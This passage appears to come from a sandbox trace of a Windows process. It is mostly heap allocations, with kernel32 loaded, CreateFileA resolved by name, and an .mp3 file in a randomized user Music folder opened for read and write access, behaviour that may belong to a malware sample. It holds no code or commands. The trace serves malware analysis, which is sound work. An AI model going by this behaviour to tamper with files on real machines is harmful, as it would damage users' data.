returned 0x9bd7f8 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0186.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0186.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0186.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0186.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0186.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0186.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0186.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0186.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.703] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0186.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.706] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0186.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba0c0 [0186.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba0c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0186.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.707] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0186.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0186.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba0c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0186.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.707] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0186.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0186.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0186.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3", cchWideChar=92, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 92 [0186.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5c) returned 0x9a5d78 [0186.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3", cchWideChar=92, lpMultiByteStr=0x9a5d78, cbMultiByte=92, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3", lpUsedDefaultChar=0x0) returned 92 [0186.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0186.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.709] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\jrsqynikkqeitv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0186.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0186.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0186.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0186.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0186.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0186.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=92, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb8) returned 0x8fabc0 [0186.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=92, lpWideCharStr=0x8fabc0, cchWideChar=92 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3") returned 92 [0186.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0186.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fabc0 | out: hHeap=0x8a0000) returned 1 [0186.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0186.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0186.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0186.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0186.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0186.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0186.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0186.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0186.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0186.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0186.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0186.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0186.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0186.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0186.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0186.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.713] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 